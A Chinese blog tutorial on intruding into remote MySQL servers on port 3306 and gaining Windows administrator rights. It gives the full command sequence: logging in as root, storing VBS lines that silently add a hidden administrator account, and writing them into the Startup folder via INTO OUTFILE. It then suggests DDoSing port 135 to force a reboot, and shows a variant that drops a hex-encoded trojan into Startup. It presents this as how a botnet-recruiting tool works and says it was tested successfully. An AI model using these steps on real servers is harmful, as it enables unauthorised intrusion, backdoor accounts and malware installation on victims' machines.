当前位置:首页 > 电脑常识 > 正文

3306端口手动入侵 之 mysql写入启动项提权 8090安适门户

11-21 电脑常识

进入今天的正题:

1、连接到对方MYSQL 处事器。首先你要下载phpnow   百度有

20160521124225

 

下载下来然后解压到C盘根目录,找到  MySQL-5.1.50这个文件夹,再打开bin文件夹

1、打开本地cmd命令提示框,输入命令

cd C:\MySQL-5.1.50\bin      意思就是进入当前目录。然后就可以输入mysql命令了。

然后输入:

mysql -u 方针用户名,3306默认是root -h 方针ip地点 -p      回车

例如:

mysql -u root -h 192.168.0.1 -p

2、让我们来看看处事器中有些什么数据库:

show databases;   注意分号,不要删除        回车

MYSQL默认安置时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

use test;   注意分号,不要删除        回车

我们将会进入test数据库中

4、检察我们进入数据库中有些什么数据表:

show tables;   注意分号,不要删除        回车

默认的情况下,test中没有任何表的存在。以下为关键的部分

 

5、在TEST数据库下创建一个新的表;

create table a (cmd text);    注意分号,不要删除        回车

默认的情况下,test中没有任何表的存在。

好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

 

6、在表中插入内容

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

注意分号,不要删除        回车,继续下一步

insert into a values ("a=wshshell.run (""cmd.exe /c net user 8090 8090/add"",0) " );

 注意分号,不要删除        回车,继续下一步

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 8090 /add"",0) " );

 回车

注意双引号和括号以及后面的“0”必然要输入!我们将用这三条命令来成立一个VBS的脚本措施!

 

7、好了,此刻我们来看看表a中有些什么

select * from a;    注意分号,不要删除        回车,继续下一步

我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,

我们来到下一步

 

8、输出表为一个VBS的脚本文件

select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\措施\\启动\\a.vbs";

回车,如果显示 No such file or directory  就是掉败了,“大意:没有这样的文件或目录”

那就尝尝:

select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\措施\启动\a.vbs"; 

我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“\"标记。

 

9、看到这大家必定知道了,就是操作MYSQL输出一个可执行的文件而已。为什么不用BAT呢,

因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!

原来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法措置惩罚惩罚,只有作罢!

好了,找个Ddos工具打击135让处事器重启吧,几分钟以后你就是打点员了。

 

最后附两张张提权过程图,怕新手懵逼。(图片 单机放大!)

tiquan

详细讲解:

xiangxi

提权结束

8、小科普,其实还可以这样写:

create table a (cmd BLOB); 
insert into a values (CONVERT(木马的16进制代码,CHAR)); 
select * from a into dumpfile ’C://Documents and Settings//All Users//「开始」菜单//措施/启动//mm.exe’ 
drop table a;

执行前3条语句,就可以将木马写进启动里了,前提是木马必然要是16进制,还有就是路径要是//,因为windows会自动过滤失一个/

 

注:这就是3306抓鸡工具的运行道理

已经测试:可以告成

温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12863.html

博客主人杰米WWW
杰米博客,为大家提供seo以及it方面技巧喜欢的朋友收藏哦!
  • 11365文章总数
  • 1378074访问次数
  • 建站天数
  •